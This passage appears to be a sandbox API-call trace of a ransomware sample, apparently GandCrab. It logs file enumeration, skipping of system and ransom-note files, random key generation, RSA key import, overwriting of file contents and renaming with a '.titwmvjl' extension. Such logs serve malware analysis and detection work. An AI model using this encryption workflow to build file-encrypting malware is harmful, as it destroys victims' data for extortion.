dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.265] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\YkS_oztkhnLjlc1Hk2.flv") returned 60 [0086.265] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\YkS_oztkhnLjlc1Hk2.flv") returned 60 [0086.265] lstrcmpiW (lpString1="YkS_oztkhnLjlc1Hk2.flv", lpString2="desktop.ini") returned 1 [0086.265] lstrcmpiW (lpString1="YkS_oztkhnLjlc1Hk2.flv", lpString2="autorun.inf") returned 1 [0086.265] lstrcmpiW (lpString1="YkS_oztkhnLjlc1Hk2.flv", lpString2="ntuser.dat") returned 1 [0086.265] lstrcmpiW (lpString1="YkS_oztkhnLjlc1Hk2.flv", lpString2="iconcache.db") returned 1 [0086.265] lstrcmpiW (lpString1="YkS_oztkhnLjlc1Hk2.flv", lpString2="bootsect.bak") returned 1 [0086.265] lstrcmpiW (lpString1="YkS_oztkhnLjlc1Hk2.flv", lpString2="boot.ini") returned 1 [0086.265] lstrcmpiW (lpString1="YkS_oztkhnLjlc1Hk2.flv", lpString2="ntuser.dat.log") returned 1 [0086.265] lstrcmpiW (lpString1="YkS_oztkhnLjlc1Hk2.flv", lpString2="thumbs.db") returned 1 [0086.265] lstrcmpiW (lpString1="YkS_oztkhnLjlc1Hk2.flv", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0086.265] lstrcmpiW (lpString1="YkS_oztkhnLjlc1Hk2.flv", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0086.266] lstrcmpiW (lpString1="YkS_oztkhnLjlc1Hk2.flv", lpString2="KRAB-DECRYPT.html") returned 1 [0086.266] lstrcmpiW (lpString1="YkS_oztkhnLjlc1Hk2.flv", lpString2="CRAB-DECRYPT.html") returned 1 [0086.266] lstrcmpiW (lpString1="YkS_oztkhnLjlc1Hk2.flv", lpString2="KRAB-DECRYPT.txt") returned 1 [0086.266] lstrcmpiW (lpString1="YkS_oztkhnLjlc1Hk2.flv", lpString2="CRAB-DECRYPT.txt") returned 1 [0086.266] lstrcmpiW (lpString1="YkS_oztkhnLjlc1Hk2.flv", lpString2="ntldr") returned 1 [0086.266] lstrcmpiW (lpString1="YkS_oztkhnLjlc1Hk2.flv", lpString2="NTDETECT.COM") returned 1 [0086.266] lstrcmpiW (lpString1="YkS_oztkhnLjlc1Hk2.flv", lpString2="Bootfont.bin") returned 1 [0086.266] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\YkS_oztkhnLjlc1Hk2.flv") returned 60 [0086.266] lstrlenW (lpString=".flv") returned 4 [0086.266] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.266] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".flv ") returned 5 [0086.266] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.266] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.266] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\YkS_oztkhnLjlc1Hk2.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\yks_oztkhnljlc1hk2.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0086.267] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.267] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0086.268] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.268] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.268] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0086.269] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0086.269] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0086.269] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0086.269] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0086.269] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.269] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.269] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.270] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.270] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0086.271] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0086.271] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0086.271] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0086.271] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0086.271] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.271] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.271] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.271] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.272] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0086.273] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.273] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503938) returned 1 [0086.273] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.273] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0086.273] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.273] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0086.273] GetLastError () returned 0x0 [0086.273] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.274] CryptDestroyKey (hKey=0x503938) returned 1 [0086.274] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.274] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.274] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.274] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0086.275] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.275] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5036f8) returned 1 [0086.275] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.275] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0086.275] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.276] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0086.276] GetLastError () returned 0x0 [0086.276] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.276] CryptDestroyKey (hKey=0x5036f8) returned 1 [0086.276] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.276] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.276] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0086.276] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0086.276] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x4007, lpOverlapped=0x0) returned 1 [0086.289] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffffbff9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.289] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x4007, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x4007, lpOverlapped=0x0) returned 1 [0086.290] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.291] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0086.292] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.295] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.296] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.296] CloseHandle (hObject=0x2b4) returned 1 [0086.296] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\YkS_oztkhnLjlc1Hk2.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\yks_oztkhnljlc1hk2.flv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\YkS_oztkhnLjlc1Hk2.flv.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\yks_oztkhnljlc1hk2.flv.titwmvjl"), dwFlags=0x1) returned 1 [0086.297] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.297] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0086.297] lstrcmpW (lpString1="_vK0r9b9nfmo8rr.swf", lpString2=".") returned 1 [0086.297] lstrcmpW (lpString1="_vK0r9b9nfmo8rr.swf", lpString2="..") returned 1 [0086.297] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="_vK0r9b9nfmo8rr.swf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\_vK0r9b9nfmo8rr.swf") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\_vK0r9b9nfmo8rr.swf" [0086.297] lstrlenW (lpString=".titwmvjl") returned 9 [0086.297] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\_vK0r9b9nfmo8rr.swf") returned 57 [0086.297] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.298] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\_vK0r9b9nfmo8rr.swf.titwmvjl") returned 66 [0086.298] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\_vK0r9b9nfmo8rr.swf") returned 57 [0086.298] lstrlenW (lpString=".swf") returned 4 [0086.298] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.298] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".swf ") returned 5 [0086.298] lstrcmpiW (lpString1=".swf", lpString2=".titwmvjl") returned -1 [0086.298] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.299] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\_vK0r9b9nfmo8rr.swf") returned 57 [0086.299] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\_vK0r9b9nfmo8rr.swf") returned 57 [0086.299] lstrcmpiW (lpString1="_vK0r9b9nfmo8rr.swf", lpString2="desktop.ini") returned -1 [0086.299] lstrcmpiW (lpString1="_vK0r9b9nfmo8rr.swf", lpString2="autorun.inf") returned -1 [0086.299] lstrcmpiW (lpString1="_vK0r9b9nfmo8rr.swf", lpString2="ntuser.dat") returned -1 [0086.299] lstrcmpiW (lpString1="_vK0r9b9nfmo8rr.swf", lpString2="iconcache.db") returned -1 [0086.299] lstrcmpiW (lpString1="_vK0r9b9nfmo8rr.swf", lpString2="bootsect.bak") returned -1 [0086.299] lstrcmpiW (lpString1="_vK0r9b9nfmo8rr.swf", lpString2="boot.ini") returned -1 [0086.299] lstrcmpiW (lpString1="_vK0r9b9nfmo8rr.swf", lpString2="ntuser.dat.log") returned -1 [0086.299] lstrcmpiW (lpString1="_vK0r9b9nfmo8rr.swf", lpString2="thumbs.db") returned -1 [0086.299] lstrcmpiW (lpString1="_vK0r9b9nfmo8rr.swf", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0086.299] lstrcmpiW (lpString1="_vK0r9b9nfmo8rr.swf", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0086.299] lstrcmpiW (lpString1="_vK0r9b9nfmo8rr.swf", lpString2="KRAB-DECRYPT.html") returned -1 [0086.299] lstrcmpiW (lpString1="_vK0r9b9nfmo8rr.swf", lpString2="CRAB-DECRYPT.html") returned -1 [0086.299] lstrcmpiW (lpString1="_vK0r9b9nfmo8rr.swf", lpString2="KRAB-DECRYPT.txt") returned -1 [0086.299] lstrcmpiW (lpString1="_vK0r9b9nfmo8rr.swf", lpString2="CRAB-DECRYPT.txt") returned -1 [0086.299] lstrcmpiW (lpString1="_vK0r9b9nfmo8rr.swf", lpString2="ntldr") returned -1 [0086.299] lstrcmpiW (lpString1="_vK0r9b9nfmo8rr.swf", lpString2="NTDETECT.COM") returned -1 [0086.299] lstrcmpiW (lpString1="_vK0r9b9nfmo8rr.swf", lpString2="Bootfont.bin") returned -1 [0086.299] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\_vK0r9b9nfmo8rr.swf") returned 57 [0086.299] lstrlenW (lpString=".swf") returned 4 [0086.299] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.299] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".swf ") returned 5 [0086.299] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.299] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.300] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\_vK0r9b9nfmo8rr.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\_vk0r9b9nfmo8rr.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0086.300] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.300] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0086.301] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.301] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.301] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0086.302] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0086.302] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0086.302] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0086.302] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0086.303] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.303] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.303] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.303] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.303] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0086.304] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0086.304] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0086.304] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0086.304] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0086.305] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.305] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.305] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.305] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.305] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0086.306] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.306] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5033b8) returned 1 [0086.306] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.306] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0086.306] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.307] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0086.307] GetLastError () returned 0x0 [0086.307] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.307] CryptDestroyKey (hKey=0x5033b8) returned 1 [0086.307] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.307] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.307] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.307] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0086.308] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.309] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5034f8) returned 1 [0086.309] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.309] CryptGetKeyParam (in: hKey=0x5034f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0086.309] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.309] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0086.309] GetLastError () returned 0x0 [0086.309] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.309] CryptDestroyKey (hKey=0x5034f8) returned 1 [0086.309] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.309] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.309] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0086.310] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0086.310] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x369e, lpOverlapped=0x0) returned 1 [0086.328] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffffc962, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.328] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x369e, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x369e, lpOverlapped=0x0) returned 1 [0086.329] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.329] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0086.330] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.334] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.334] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.334] CloseHandle (hObject=0x2b4) returned 1 [0086.335] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\_vK0r9b9nfmo8rr.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\_vk0r9b9nfmo8rr.swf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\_vK0r9b9nfmo8rr.swf.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\_vk0r9b9nfmo8rr.swf.titwmvjl"), dwFlags=0x1) returned 1 [0086.335] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.336] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0 [0086.336] FindClose (in: hFindFile=0x503778 | out: hFindFile=0x503778) returned 1 [0086.337] CloseHandle (hObject=0x2ac) returned 1 [0086.338] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0086.338] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0086.338] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0086.338] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\TITWMVJL-DECRYPT.txt" [0086.338] lstrlenW (lpString=".titwmvjl") returned 9 [0086.338] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\TITWMVJL-DECRYPT.txt") returned 50 [0086.338] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.338] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 59 [0086.338] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\TITWMVJL-DECRYPT.txt") returned 50 [0086.338] lstrlenW (lpString=".txt") returned 4 [0086.338] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.338] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0086.338] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0086.338] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.338] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\TITWMVJL-DECRYPT.txt") returned 50 [0086.338] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\TITWMVJL-DECRYPT.txt") returned 50 [0086.338] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0086.339] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0086.339] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0086.339] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0086.339] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0086.339] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0086.339] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0086.339] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0086.339] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.339] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0086.339] FindClose (in: hFindFile=0x5038f8 | out: hFindFile=0x5038f8) returned 1 [0086.340] CloseHandle (hObject=0x230) returned 1 [0086.340] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0086.340] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0086.340] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0086.340] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Application Data" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Application Data") returned="C:\\Users\\CIiHmnxMn6Ps\\Application 